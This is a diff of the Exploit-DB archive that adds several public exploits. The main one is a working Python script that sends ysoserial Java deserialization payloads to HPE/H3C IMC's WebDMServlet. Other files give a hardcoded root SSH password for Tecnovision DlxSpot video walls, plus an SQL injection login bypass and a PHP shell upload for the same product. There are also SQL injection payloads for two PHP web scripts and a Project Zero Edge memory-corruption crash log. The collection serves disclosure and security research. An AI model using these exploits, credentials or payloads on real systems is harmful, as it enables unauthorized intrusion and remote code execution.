42739,platforms/hardware/webapps/42739.txt,"UTStar WA3002G4 ADSL Broadband Modem - Authentication Bypass",2017-09-15,"Gem George",hardware,webapps,0 42740,platforms/hardware/webapps/42740.txt,"iBall ADSL2+ Home Router - Authentication Bypass",2017-09-18,"Gem George",hardware,webapps,0 -42745,platforms/linux/webapps/42745.py,"Apache - HTTP OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0 +42745,platforms/linux/webapps/42745.py,"Apache < 2.2.34 / < 2.4.27 - HTTP OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0 +42751,platforms/php/webapps/42751.txt,"Foodspotting Clone 1.0 - SQL Injection",2017-09-13,8bitsec,php,webapps,0 +42752,platforms/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection",2017-09-15,8bitsec,php,webapps,0 +42754,platforms/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-14,"Simon Brannstrom",php,webapps,0 +42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-14,"Simon Brannstrom",php,webapps,0 diff --git a/platforms/java/remote/42756.py b/platforms/java/remote/42756.py new file mode 100755 index 000000000..668aa7486 --- /dev/null +++ b/platforms/java/remote/42756.py @@ -0,0 +1,104 @@ +#!/usr/bin/env python + +######################################################################################################## +# +# HPE/H3C IMC - Java Deserialization Exploit +# +# Version 0.1 +# Tested on Windows Server 2008 R2 +# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91 +# +# Author: +# Raphael Kuhn (Daimler TSS) +# +# Special thanks to: +# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon +# +####################################################################################################### + +import requests +import sys +import os +import os.path +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +host = "127.0.0.1:8080" +payload_file = "payload.bin" +body = "" + +def printUsage () : + print "......................................................................................................................" + print "." + print ". HPE/H3C - IMC Java Deserialization Exploit" + print "." + print ". Example 1: -payload-binary" + print ". [-] Usage: %s http[s]://: -payload-binary payload" % sys.argv[0] + print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] + print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) " + print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin" + print ". 2. Send request to server" + print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0] + print "." + print ". Example 2: -payload-string" + print '. [-] Usage: %s http[s]://: -payload-string "payload"' % sys.argv[0] + print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] + print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)" + print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0] + print "." + print "......................................................................................................................" + +def loadPayloadFile (_fileName) : + print "[+] Load payload file %s" % _fileName + payloadFile = open(_fileName, 'rb') + payloadFile_read = payloadFile.read() + return payloadFile_read + +def exploit (_payload) : + url = sys.argv[1] + url += "/imc/topo/WebDMServlet" + print "[+] Sending exploit to %s" % (url) + data = _payload + response = requests.post(url, data=data, verify=False) + return response + +#def showResponse(_response): +# r = response +# m = r.search(_response) +# if (m.find("java.lang.NullPointerException")): +# print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)" +# else: +# print "[-] ClassCastException not found, exploit failed" + + +if __name__ == "__main__": + if len(sys.argv) < 4: + printUsage() + sys.exit(0) + else: + print "------------------------------------------" + print "- HPE/H3C - IMC Java Deserialization Exploit -" + print "------------------------------------------" + host = sys.argv[1] + print "[*] Connecting to %s" %host + if sys.argv[2] == "-payload-binary": + payload_file = sys.argv[3] + if os.path.isfile(payload_file): + payload = loadPayloadFile(payload_file) + response = exploit(payload) + showResponse(response.content) + else: + print "[-] Can't load payload file" + elif sys.argv[2] == "-payload-string": + if os.path.isfile("ysoserial.jar"): + sPayload = sys.argv[3] + sPayload = "java -jar ysoserial.jar CommonsCollections5 '" +sPayload+ "' > payload.bin" + print "[+] Create payload file (%s) " %sPayload + os.system(sPayload) + payload = loadPayloadFile(payload_file) + response = exploit(payload) + print "[+] Response received, exploit finished." + else: + print "[-] Can't load ysoserial.jar" + else: + printUsage() diff --git a/platforms/multiple/remote/42753.txt b/platforms/multiple/remote/42753.txt new file mode 100755 index 000000000..de473d2e5 --- /dev/null +++ b/platforms/multiple/remote/42753.txt @@ -0,0 +1,34 @@ +# Exploit Title: DlxSpot - Player4 LED video wall - Hardcoded Root SSH Password. +# Google Dork: "DlxSpot - Player4" +# Date: 2017-05-14 +# Discoverer: Simon Brannstrom +# Authors Website: https://unknownpwn.github.io/ +# Vendor Homepage: http://www.tecnovision.com/ +# Software Link: n/a +# Version: All known versions +# Tested on: Linux +# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world, they are used in football arenas, concert halls, shopping malls, as roadsigns etc. +# CVE: CVE-2017-12928 +# Linked CVE's: CVE-2017-12929, CVE-2017-12930 + +# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access. +############################################################################################################################### + +Hardcoded password for all dlxspot players, login with the following credentials via SSH + +username: dlxuser +password: tecn0visi0n + +Escalate to root with the same password. + +TIMELINE: +2017-05-14 - Discovery of vulnerabilities. +2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage. +2017-06-01 - No response, tried contacting again through several contact forms on homepage. +2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment. +2017-08-17 - Three CVE's assigned for the vulnerabilities found. +2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company. +2017-09-18 - No response, full public disclosure. + + DEDICATED TO MARCUS ASTROM +FOREVER LOVED - NEVER FORGOTTEN \ No newline at end of file diff --git a/platforms/php/webapps/42751.txt b/platforms/php/webapps/42751.txt new file mode 100755 index 000000000..6735a908a --- /dev/null +++ b/platforms/php/webapps/42751.txt @@ -0,0 +1,44 @@ +# Exploit Title: Foodspotting Clone v1.0 - SQL Injection/Reflected XSS +# Date: 2017-09-13 +# Exploit Author: 8bitsec +# Vendor Homepage: http://www.phpscriptsmall.com/ +# Software Link: http://www.phpscriptsmall.com/product/foodspotting-clone/ +# Version: 1.0 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-09-13 + +Product & Service Introduction: +=============================== +Foodspotting Clone allows you to initiate your very own social networking website that similar appearance as Foodspotting and additional food lover websites. + +Technical Details & Description: +================================ + +Reflected XSS/SQL injection on [resid] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +http://localhost/[path]/restaurant-menu.php?resid=' AND SLEEP(5) AND 'nhSH'='nhSH + +Parameter: resid (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: resid=' AND SLEEP(5) AND 'nhSH'='nhSH + + Type: UNION query + Title: Generic UNION query (NULL) - 14 columns + Payload: resid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x435a72445467737074496d6e5a7855726f6e534c4b6469705774427550576c70676d425361626642,0x71767a6271),NULL,NULL,NULL-- aIwp + +Reflected XSS: + +http://localhost/[path]/restaurant-menu.php?resid=/"> +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/42752.txt b/platforms/php/webapps/42752.txt new file mode 100755 index 000000000..d7885ef54 --- /dev/null +++ b/platforms/php/webapps/42752.txt @@ -0,0 +1,37 @@ +# Exploit Title: iTech Gigs Script v1.20 - SQL Injection +# Date: 2017-09-15 +# Exploit Author: 8bitsec +# Vendor Homepage: http://itechscripts.com/ +# Software Link: http://itechscripts.com/the-gigs-script/ +# Version: 1.20 +# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6] +# Email: contact@8bitsec.io +# Contact: https://twitter.com/_8bitsec + +Release Date: +============= +2017-09-15 + +Product & Service Introduction: +=============================== +Designed to launch an online market place facilitating participation of professionals from diverse walks of life. + +Technical Details & Description: +================================ + +SQL injection on [cat] parameter. + +Proof of Concept (PoC): +======================= + +SQLi: + +http://localhost/[path]/browse-category.php?cat=xxxxx' AND 4079=4079 AND 'zpSy'='zpSy + +Parameter: cat (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: cat=10c4ca4238a0b923820dcc509a6f75849b' AND 4079=4079 AND 'zpSy'='zpSy + +================== +8bitsec - [https://twitter.com/_8bitsec] \ No newline at end of file diff --git a/platforms/php/webapps/42754.txt b/platforms/php/webapps/42754.txt new file mode 100755 index 000000000..f6835f18a --- /dev/null +++ b/platforms/php/webapps/42754.txt @@ -0,0 +1,43 @@ +# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL +Injection +# Google Dork: "DlxSpot - Player4" +# Date: 2017-05-14 +# Discoverer: Simon Brannstrom +# Authors Website: https://unknownpwn.github.io/ +# Vendor Homepage: http://www.tecnovision.com/ +# Software Link: n/a +# Version: >1.5.10 +# Tested on: Linux +# About: DlxSpot is the software controlling Tecnovision LED Video Walls +all over the world, they are used in football arenas, concert halls, +shopping malls, as roadsigns etc. +# CVE: CVE-2017-12930 +# Linked CVE's: CVE-2017-12928, CVE-2017-12929 + +# Visit my github page at +https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md +for complete takeover of the box, from SQLi to full root access. +############################################################################################################################### + +DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection +vulnerability in the admin interface login and is exploitable the following +way: + +username:admin +password:x' or 'x'='x + +TIMELINE: +2017-05-14 - Discovery of vulnerabilities. +2017-05-15 - Contacted Tecnovision through contact form on manufacturer +homepage. +2017-06-01 - No response, tried contacting again through several contact +forms on homepage. +2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) +requesting CVE assignment. +2017-08-17 - Three CVE's assigned for the vulnerabilities found. +2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an +email in Italian to the company. +2017-09-18 - No response, full public disclosure. + + DEDICATED TO MARCUS ASTROM +FOREVER LOVED - NEVER FORGOTTEN diff --git a/platforms/php/webapps/42755.txt b/platforms/php/webapps/42755.txt new file mode 100755 index 000000000..45fbea286 --- /dev/null +++ b/platforms/php/webapps/42755.txt @@ -0,0 +1,43 @@ +# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload +to RCE +# Google Dork: "DlxSpot - Player4" +# Date: 2017-05-14 +# Discoverer: Simon Brannstrom +# Authors Website: https://unknownpwn.github.io/ +# Vendor Homepage: http://www.tecnovision.com/ +# Software Link: n/a +# Version: >1.5.10 +# Tested on: Linux +# About: DlxSpot is the software controlling Tecnovision LED Video Walls +all over the world, they are used in football arenas, concert halls, +shopping malls, as roadsigns etc. +# CVE: CVE-2017-12929 +# Linked CVE's: CVE-2017-12928, CVE-2017-12930. + +# Visit my github page at +https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md +for complete takeover of the box, from SQLi to root access. +############################################################################################################################### + +Arbitrary File Upload leading to Remote Command Execution: + +1. Visit http://host/resource.php and upload PHP shell. For example: +2. RCE via http://host/resource/source/shell.php?c=id +3. Output: www-data + +TIMELINE: +2017-05-14 - Discovery of vulnerabilities. +2017-05-15 - Contacted Tecnovision through contact form on manufacturer +homepage. +2017-06-01 - No response, tried contacting again through several contact +forms on homepage. +2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) +requesting CVE assignment. +2017-08-17 - Three CVE's assigned for the vulnerabilities found. +2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an +email in Italian to the company. +2017-09-18 - No response, full public disclosure. + + DEDICATED TO MARCUS ASTROM +FOREVER LOVED - NEVER FORGOTTEN diff --git a/platforms/windows/dos/42758.txt b/platforms/windows/dos/42758.txt new file mode 100755 index 000000000..13a5c82d2 --- /dev/null +++ b/platforms/windows/dos/42758.txt @@ -0,0 +1,115 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309 + +There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the server has finished sending the document. It is also possible that some JavaScript code is going to trigger. + +By making DOM modifications before the document had a chance of fully loading, followed by another set of DOM modifications afer the page has been loaded, it is possible to trigger memory corruption that could possibly lead to an exploitable condition. + +A debug log is included below. Note that the crash RIP directly preceeds a (CFG-protected) indirect call, which demonstrates the exploitability of the issue. + +Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/ + +Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) + + +Debug log: + +========================================= + +(a68.9c0): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa: +00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=???????????????? + +0:013> k + # Child-SP RetAddr Call Site +00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa +01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray >::DeleteAt+0x89 +02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e +03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33 +04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b +05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd +06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5 +07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445 +08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c +09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125 +0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141 +0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae +0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8 +0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a +0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841 +0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18 +10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41 +11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7 +12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105 +13 000000eb`c42fb2e0 00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124 +14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25 +15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177 +16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93 +17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon > > >+0x15d +18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex > >+0xa7 +19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132 +1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142 +1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0 +1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55 +1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2 +1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93 +1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83 +20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI > > >+0x110 +21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d +22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7 +23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0 +24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55 +25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa +26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93 +27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83 +28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104 +29 000000eb`c42fc2b0 00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a +2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5 +2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131 +2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc +2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d +2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18 +2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb +30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb +31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca +32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66 +33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405 +34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73 +35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e +36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376 +37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112 +38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af +39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273 +3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130 +3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274 +3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac +3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1 +3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1 +3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16 +40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14 +41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21 + +0:013> r +rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb +rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000 +rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0 + r8=0000000000000017 r9=000000ebc42f8e78 r10=00000fff53a47750 +r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78 +r14=000000ebc42f8e70 r15=0000000000000000 +iopl=0 nv up ei pl nz na po nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa: +00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=???????????????? + +0:013> u 00007ffa`9d5f15ea +edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa: +00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] +00007ffa`9d5f15ed 488b80d0050000 mov rax,qword ptr [rax+5D0h] +00007ffa`9d5f15f4 ff15c654ab00 call qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)] + +========================================= + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42758.zip diff --git a/platforms/windows/dos/42759.html b/platforms/windows/dos/42759.html new file mode 100755 index 000000000..981696e3a --- /dev/null +++ b/platforms/windows/dos/42759.html @@ -0,0 +1,230 @@ + + + + + + + + + \ No newline at end of file